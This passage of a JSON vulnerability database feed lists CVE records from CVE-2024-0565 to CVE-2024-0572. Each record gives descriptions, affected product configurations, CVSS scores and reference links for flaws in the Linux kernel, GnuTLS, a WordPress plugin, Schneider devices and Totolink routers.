"RHSA-2024:1607", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1614", "name" : "RHSA-2024:1614", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2093", "name" : "RHSA-2024:2093", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2394", "name" : "RHSA-2024:2394", "refsource" : "", "tags" : [ ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258518", "name" : "RHBZ#2258518", "refsource" : "", "tags" : [ "Issue Tracking", "Patch", "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0565", "name" : "https://access.redhat.com/security/cve/CVE-2024-0565", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.spinics.net/lists/stable-commits/msg328851.html", "name" : "https://www.spinics.net/lists/stable-commits/msg328851.html", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1188", "name" : "RHSA-2024:1188", "refsource" : "", "tags" : [ ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258518", "name" : "RHBZ#2258518", "refsource" : "", "tags" : [ "Issue Tracking", "Patch", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.netapp.com/advisory/ntap-20240223-0002/", "name" : "https://security.netapp.com/advisory/ntap-20240223-0002/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.spinics.net/lists/stable-commits/msg328851.html", "name" : "https://www.spinics.net/lists/stable-commits/msg328851.html", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0565", "name" : "https://access.redhat.com/security/cve/CVE-2024-0565", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2394", "name" : "RHSA-2024:2394", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2093", "name" : "RHSA-2024:2093", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1614", "name" : "RHSA-2024:1614", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1607", "name" : "RHSA-2024:1607", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1533", "name" : "RHSA-2024:1533", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1532", "name" : "RHSA-2024:1532", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1404", "name" : "RHSA-2024:1404", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An out-of-bounds memory read flaw was found in receive_encrypted_standard in fs/smb/client/smb2ops.c in the SMB Client sub-component in the Linux Kernel. This issue occurs due to integer underflow on the memcpy length, leading to a denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.7:rc1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.7:rc2:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.7:rc3:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.7:rc4:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.7:rc5:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.1.36", "versionEndExcluding" : "6.7", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:netapp:ontap_tools:-:*:*:*:*:vmware_vsphere:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "ADJACENT_NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.4, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.5, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T20:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0566", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/ca83db95-4a08-4615-aa8d-016022404c32/", "name" : "https://wpscan.com/vulnerability/ca83db95-4a08-4615-aa8d-016022404c32/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/ca83db95-4a08-4615-aa8d-016022404c32/", "name" : "https://wpscan.com/vulnerability/ca83db95-4a08-4615-aa8d-016022404c32/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Smart Manager WordPress plugin before 8.28.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:storeapps:smart_manager:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "8.28.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-12T16:15Z", "lastModifiedDate" : "2025-05-07T21:16Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0567", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-347" } ] } ] }, "references" : { "reference_data" : [ { "url" : "http://www.openwall.com/lists/oss-security/2024/01/19/3", "name" : "http://www.openwall.com/lists/oss-security/2024/01/19/3", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0533", "name" : "RHSA-2024:0533", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0533", "name" : "RHSA-2024:0533", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1082", "name" : "RHSA-2024:1082", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1082", "name" : "RHSA-2024:1082", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1383", "name" : "RHSA-2024:1383", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1383", "name" : "RHSA-2024:1383", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2094", "name" : "RHSA-2024:2094", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2094", "name" : "RHSA-2024:2094", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0567", "name" : "https://access.redhat.com/security/cve/CVE-2024-0567", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0567", "name" : "https://access.redhat.com/security/cve/CVE-2024-0567", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258544", "name" : "RHBZ#2258544", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258544", "name" : "RHBZ#2258544", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://gitlab.com/gnutls/gnutls/-/issues/1521", "name" : "https://gitlab.com/gnutls/gnutls/-/issues/1521", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ] }, { "url" : "https://gitlab.com/gnutls/gnutls/-/issues/1521", "name" : "https://gitlab.com/gnutls/gnutls/-/issues/1521", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7ZEIOLORQ7N6WRPFXZSYDL2MC4LP7VFV/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7ZEIOLORQ7N6WRPFXZSYDL2MC4LP7VFV/", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNXKVR5YNUEBNHAHM5GSYKBZX4W2HMN2/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNXKVR5YNUEBNHAHM5GSYKBZX4W2HMN2/", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.gnupg.org/pipermail/gnutls-help/2024-January/004841.html", "name" : "https://lists.gnupg.org/pipermail/gnutls-help/2024-January/004841.html", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://lists.gnupg.org/pipermail/gnutls-help/2024-January/004841.html", "name" : "https://lists.gnupg.org/pipermail/gnutls-help/2024-January/004841.html", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://security.netapp.com/advisory/ntap-20240202-0011/", "name" : "https://security.netapp.com/advisory/ntap-20240202-0011/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in GnuTLS, where a cockpit (which uses gnuTLS) rejects a certificate chain with distributed trust. This issue occurs when validating a certificate chain with cockpit-certificate-ensure. This flaw allows an unauthenticated, remote client or attacker to initiate a denial of service attack." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gnu:gnutls:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.7.0", "versionEndExcluding" : "3.8.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-16T14:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0568", "ASSIGNER" : "cpcert@se.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-044-02&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-044-02.pdf", "name" : "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-044-02&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-044-02.pdf", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-044-02&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-044-02.pdf", "name" : "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-044-02&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-044-02.pdf", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nCWE-287: Improper Authentication vulnerability exists that could cause unauthorized tampering\nof device configuration over NFC communication.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:se:rmnf22tb30_firmware:*:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:se:rmnf22tb30:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:se:renf22r2mmw_firmware:*:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:se:renf22r2mmw:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "ADJACENT_NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-14T17:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0569", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1WSWrGEKUkvPk8hq1VRng-wbR7T6CknGY/view?usp=sharing", "name" : "https://drive.google.com/file/d/1WSWrGEKUkvPk8hq1VRng-wbR7T6CknGY/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://drive.google.com/file/d/1WSWrGEKUkvPk8hq1VRng-wbR7T6CknGY/view?usp=sharing", "name" : "https://drive.google.com/file/d/1WSWrGEKUkvPk8hq1VRng-wbR7T6CknGY/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250785", "name" : "VDB-250785 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250785", "name" : "VDB-250785 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250785", "name" : "VDB-250785 | Totolink T8 Setting cstecgi.cgi getSysStatusCfg information disclosure", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250785", "name" : "VDB-250785 | Totolink T8 Setting cstecgi.cgi getSysStatusCfg information disclosure", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.263653", "name" : "Submit #263653 | Totolink T8 V4.1.5cu.833_20220905 Broken Access Control", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.263653", "name" : "Submit #263653 | Totolink T8 V4.1.5cu.833_20220905 Broken Access Control", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://www.chtsecurity.com/news/8aa31e69-1e7c-4186-8554-7d5d6baeaa84", "name" : "https://www.chtsecurity.com/news/8aa31e69-1e7c-4186-8554-7d5d6baeaa84", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.chtsecurity.com/news/8aa31e69-1e7c-4186-8554-7d5d6baeaa84", "name" : "https://www.chtsecurity.com/news/8aa31e69-1e7c-4186-8554-7d5d6baeaa84", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.chtsecurity.com/news/8f270890-12cc-4623-99a3-a81e00758c29", "name" : "https://www.chtsecurity.com/news/8f270890-12cc-4623-99a3-a81e00758c29", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.chtsecurity.com/news/8f270890-12cc-4623-99a3-a81e00758c29", "name" : "https://www.chtsecurity.com/news/8f270890-12cc-4623-99a3-a81e00758c29", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic has been found in Totolink T8 4.1.5cu.833_20220905. This affects the function getSysStatusCfg of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation of the argument ssid/key leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.5cu.862_B20230228 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-250785 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:t8_firmware:4.1.5cu.833_20220905:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:t8:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 9.1, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.2 } }, "publishedDate" : "2024-01-16T13:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0570", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.250786", "name" : "VDB-250786 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250786", "name" : "VDB-250786 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250786", "name" : "VDB-250786 | Totolink N350RT Setting cstecgi.cgi access control", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250786", "name" : "VDB-250786 | Totolink N350RT Setting cstecgi.cgi access control", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.263655", "name" : "Submit #263655 | Totolink N350RT V9.3.5u.6265 Broken Access Control", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.263655", "name" : "Submit #263655 | Totolink N350RT V9.3.5u.6265 Broken Access Control", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://www.chtsecurity.com/news/16e4f985-8248-4353-a26e-b77ca487ce31", "name" : "https://www.chtsecurity.com/news/16e4f985-8248-4353-a26e-b77ca487ce31", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.chtsecurity.com/news/16e4f985-8248-4353-a26e-b77ca487ce31", "name" : "https://www.chtsecurity.com/news/16e4f985-8248-4353-a26e-b77ca487ce31", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.chtsecurity.com/news/f6d7ae2c-fb1e-4c31-a9ce-bfc5ee038eb1", "name" : "https://www.chtsecurity.com/news/f6d7ae2c-fb1e-4c31-a9ce-bfc5ee038eb1", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.chtsecurity.com/news/f6d7ae2c-fb1e-4c31-a9ce-bfc5ee038eb1", "name" : "https://www.chtsecurity.com/news/f6d7ae2c-fb1e-4c31-a9ce-bfc5ee038eb1", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in Totolink N350RT 9.3.5u.6265. This vulnerability affects unknown code of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. It is recommended to upgrade the affected component. VDB-250786 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:n350rt_firmware:9.3.5u.6265:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:n350rt:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 9.1, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.2 } }, "publishedDate" : "2024-01-16T14:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0571", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/1/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/1/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/1/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/1/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250787", "name" : "https://vuldb.com/?ctiid.250787", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250787", "name" : "https://vuldb.com/?ctiid.250787", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250787", "name" : "https://vuldb.com/?id.250787", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250787", "name" : "https://vuldb.com/?id.250787", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in Totolink LR1200GB 9.1.0u.6619_B20230130. This issue affects the function setSmsCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument text leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250787. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:lr1200gb_firmware:9.1.0u.6619_b20230130:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:lr1200gb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-16T14:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0572", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/2/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/2/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/2/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/2/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250788", "name" : "https://vuldb.com/?ctiid.250788", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250788", "name" : "https://vuldb.com/?ctiid.250788", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250788", "name" : "https://vuldb.com/?id.250788", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250788", "name" : "https://vuldb.com/?id.250788", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected is the function setOpModeCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument pppoeUser leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The 